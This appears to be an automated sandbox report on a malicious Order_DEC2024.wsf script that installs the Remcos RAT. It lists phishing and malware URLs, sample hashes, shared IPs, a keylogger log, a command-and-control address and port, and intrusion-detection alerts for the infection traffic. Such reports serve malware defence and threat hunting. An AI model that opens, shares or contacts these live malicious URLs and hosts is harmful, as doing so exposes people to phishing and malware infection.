                                                                                                                                                                                  https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.16.123.96
                                                                                                                                                                                  https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.17.25.14
                                                                                                                                                                                  Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.18.86.42
                                                                                                                                                                                  https://jxgy-zcmp.maillist-manage.eu/click/1315cead38f4e738/1315cead38f50cecGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.64.144.254
                                                                                                                                                                                  MicrosoftScript.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                                  • 172.67.19.24
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.16.9
                                                                                                                                                                                  https://excel-share-ten.vercel.app/#Q09AYW5zc2kuZnIGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 104.18.11.207
                                                                                                                                                                                  https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 104.26.7.141
                                                                                                                                                                                  Structural_Design_Proposal.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.16.230.132
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  28a2c9bd18a11de089ef85a160da29e4https://u48081970.ct.sendgrid.net/ls/click?upn=u001.vNxnXXzC2QsasPA6W6ADpt-2Ftorlqu4ypy1cx618BO406CuTHe6Rdpmm4JfxhQmns-2B9IcSpgwJrNHXYfa1uXDUgS9xVKd9ZaAsws4zk7muCg-3DZZr1_86mcl1dEDC9SsRn0J-2B7n6xG4PLWb-2FVElhDs9zkYSfOVUWEBOuIAwgb9WpkpxhmyQMvzh9Kpdo3GVQ9nn-2BdarUcw1Be1RgOuXLzqHPNUHTd4mWAin5j-2BbK5LI9vw-2FwoT4CfXbn2rvr5PC14V-2BoEesvL2IwUpGrOwfyzirkerYq8Bbu6UXfMYK8JypQJLQFTzv9qOKM9xwxbsZEsN-2FS8c7yPpSVyD4JV6Ez1fwyruBZbRT67v2slyMK0dybL01-2FqY1O3quC8MNfOL54dEjEjjjtBhtF8l6gl-2BFk97-2FcagJqrRH-2BP4AOzpSTLN8aGjPkIeZfkWYhxIDr2ShdgJYfmFjbRrp6vD-2BEA0P1tDuf4k2w8KcMQsSCFCuO-2BSnL609Wz8y8d8IiJB-2BVOZstmbWmLPRVsjdic3dco790-2BndBO7DIhPAMWasm-2BSuMUmmKOVREaHHO1TmBLay3m-2Fqnd5qCadiu5n-2BBlTPeuRSd8m6Tx8Sj3LjxuSOmm0dIJIeP096RcuawY-2Bwm35dxyKgk9lwZ2FL0G9hMwSeHpWOjTqpbJ6cwnE0Nv6qjBSfLUN9pmUsuyjY22-2BPk-2Bu2QeCEIGZJeMC2mHR4iXU1Qd68tL0Wn-2BzNpsZPJKME2mpPl5RPmepvjIPYDYzLppde1eyHOjjkxp-2B6BOc-2FRZoyOwKNazhxqqEDxsmGEjLPPvZqanPzaTyGLfYcN0Kc4jZf6lBDAt02aCwmH2QRoGIW7S6jsbtrjJTjOztrvCHISe02saguqYwC4HGC2M60hhERSXlfzGrn5fBrmeO2Z-2BnVPO-2BGSOD-2FR1GgZXWRHW1IcKsHxaS0BjTdT4JTEvq3q-2B2Me7kitfPPju2fy0BbVh1w1AsRRqxG98UgBhZKMLhRZ9ju7VnLLYoEC6281aKRZYKi84zlwZdKcDlGWdCJDSLVukCfyYJScludzZM-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  lnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  https://excel-share-ten.vercel.app/#Q09AYW5zc2kuZnIGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  https://cdn.btmessage.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  http://certificatdeluxe.live/l/renew-certGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eBank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  lnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402Get hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  MicrosoftScript.ps1Get hashmaliciousAsyncRAT, PureLog StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  Order NO 000293988494948595850000595995000.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  Pagamento,jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  Structural_Design_Proposal.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc, VidarBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 104.21.84.67
                                                                                                                                                                                  No context
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                  Entropy (8bit):3.3708727686148316
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:rhlKlyKrIVlU7fwl55JWRal2Jl+7R0DAlBG45klovDl6v:6lZ8PUEl55YcIeeDAlOWAv
                                                                                                                                                                                  MD5:D84C31D9D78A96AF477DB86A737AADD3
                                                                                                                                                                                  SHA1:0182AB8FE6412FFFE9F362A841DFFB3C49F2A22E
                                                                                                                                                                                  SHA-256:EA400135B29CE9C30141D7FA5520B921BC929CFA1557950A14E52F63BE3336B6
                                                                                                                                                                                  SHA-512:94B232D9C192347A16E465F3F61A2B6705A4D174C3ACB588257A8FB230E16E78A2EA780D5CF28BE97F398734269DFA6739D64C73BB75500E5136F9B1B0BCB934
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                  Preview:....[.2.0.2.4./.1.2./.0.4. .0.5.:.0.9.:.2.6. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):963
                                                                                                                                                                                  Entropy (8bit):5.01340392779544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:tkluJnd66GkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkw7x:qluNdbauKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                  MD5:353DFD85F7CEA1AE2618639F555626F7
                                                                                                                                                                                  SHA1:C36E7929F2173540028FF62C87751E92F54B8F88
                                                                                                                                                                                  SHA-256:039F79D984650F3758F43BCBDF012BD8D5BAF2EB27523CB08E725D6B84C50C71
                                                                                                                                                                                  SHA-512:DB7EFA0B6BF72DE65167AB65882BCAA1B6CCFEE7252822CC0C43476D3C08AA3630082A9AEA26582D74AA559A69FA13283321B8924A10A74062DF4F661B8D3980
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"0ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9434
                                                                                                                                                                                  Entropy (8bit):4.928515784730612
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
                                                                                                                                                                                  MD5:D3594118838EF8580975DDA877E44DEB
                                                                                                                                                                                  SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
                                                                                                                                                                                  SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
                                                                                                                                                                                  SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):64
                                                                                                                                                                                  Entropy (8bit):1.1940658735648508
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Nlllul3nqth:NllUa
                                                                                                                                                                                  MD5:851531B4FD612B0BC7891B3F401A478F
                                                                                                                                                                                  SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                                                                                                                                  SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                                                                                                                                  SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:@...e.................................&..............@..........
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x3991fa65, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20447232
                                                                                                                                                                                  Entropy (8bit):1.2829009149127535
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:6UAgIU87sK+OfvUDZ21+U+5cdZFWHHslKF:UUlZDk+
                                                                                                                                                                                  MD5:F889E872BD8A8AFC0F6858DC681958ED
                                                                                                                                                                                  SHA1:6382D42D9225E4FBF22796F23E86B54FE96B1694
                                                                                                                                                                                  SHA-256:83B12BE28D662D8DE0588C5FDED60F15E5A9155B57354B03F876187E2F2BA605
                                                                                                                                                                                  SHA-512:5647970C21BA132F3B2FDCCBDE4B0DE43E3838878BF36F86C11A2AF2E86E1F2B26065BDDA59CD3AEC44311536070F92E16B77035362BF2035CEA330A7E2997C7
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:9..e... ........=......J}...0...{........................"..........{.......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;..................................G.......{...................T~'.....{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Qn:Qn
                                                                                                                                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:..
                                                                                                                                                                                  File type:HTML document, Unicode text, UTF-16, little-endian text, with very long lines (611), with CRLF line terminators
                                                                                                                                                                                  Entropy (8bit):4.419388371382694
                                                                                                                                                                                  TrID:
                                                                                                                                                                                  • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                                                                                                                                                                  • MP3 audio (1001/1) 32.22%
                                                                                                                                                                                  • Lumena CEL bitmap (63/63) 2.03%
                                                                                                                                                                                  • Corel Photo Paint (41/41) 1.32%
                                                                                                                                                                                  File name:Order_DEC2024.wsf
                                                                                                                                                                                  File size:3'378 bytes
                                                                                                                                                                                  MD5:c209a2bdfa9028df5da14abdc1fc58ce
                                                                                                                                                                                  SHA1:17b2e2192cccdde3bc51197285ccdc5a0dc80587
                                                                                                                                                                                  SHA256:a2e71163d56c1feb4714e20d8b559bcf005e10b9044d9565afa0e257b0eb4d62
                                                                                                                                                                                  SHA512:0d7a39070b32d140bfcf01f125eea94d9016d0e641e461d1d2a8d0b42d5d0cc8388fccc1c08272ed09bde710cbd4154b281e638b9f608e7e0b344d6aa3bd54c9
                                                                                                                                                                                  SSDEEP:96:R/IEa2AIROFQBUFGxyXaBw8fRuC33jxIIjm83qVqqInIArpvwMYafO:HbJUq/gC33jxIIjm83qVqqInIArpvVG
                                                                                                                                                                                  TLSH:5261AC81EAEB0655EDFA9A1C7532439D2A737E07243D983C479C290E4FE3950449A7F3
                                                                                                                                                                                  File Content Preview:..<.j.o.b. .i.d.=.".a.m.u.r.a.r.".>..... . . . .<.s.c.r.i.p.t. .l.a.n.g.u.a.g.e.=.".V.B.S.c.r.i.p.t.".>......... . . . .F.u.n.c.t.i.o.n. .G.e.t.P.r.e.f.i.x.F.o.r.N.a.m.e.s.p.a.c.e.(.n.o.d.e.,. .n.a.m.e.s.p.a.c.e.)..... . . . .D.i.m. .r.o.o.t.N.o.d.e.,. .x
                                                                                                                                                                                  Icon Hash:68d69b8f86ab9a86
                                                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                  2024-12-04T11:09:00.772618+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.84.67443TCP
                                                                                                                                                                                  2024-12-04T11:09:26.007651+01002841075ETPRO MALWARE Terse Request to paste .ee - Possible Download1192.168.2.449739104.21.84.67443TCP
                                                                                                                                                                                  2024-12-04T11:09:26.465982+01002020424ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M11104.21.84.67443192.168.2.449739TCP
                                                                                                                                                                                  2024-12-04T11:09:26.465982+01002020425ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M21104.21.84.67443192.168.2.449739TCP
                                                                                                                                                                                  2024-12-04T11:09:27.465960+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1104.21.84.67443192.168.2.449739TCP
                                                                                                                                                                                  2024-12-04T11:09:29.988337+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449740160.25.73.256426TCP
                                                                                                                                                                                  2024-12-04T11:09:33.129463+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449742178.237.33.5080TCP
                                                                                                                                                                                  2024-12-04T11:09:33.378941+01002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449741160.25.73.256426TCP
                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                  Dec 4, 2024 11:08:58.140418053 CET4973080192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:08:58.260413885 CET8049730104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:08:58.260507107 CET4973080192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:08:58.260715961 CET4973080192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:08:58.381114006 CET8049730104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:08:59.483275890 CET8049730104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:08:59.486798048 CET4973080192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:08:59.493315935 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:08:59.493361950 CET44349731104.21.84.67192.168.2.4
                                                                                                                                                                                  Dec 4, 2024 11:08:59.493424892 CET49731443192.168.2.4104.21.84.67
                                                                                                                                                                                  Dec 4, 2024 11:08:59.508130074 CET49731443192.168.2.4104.21.84.67
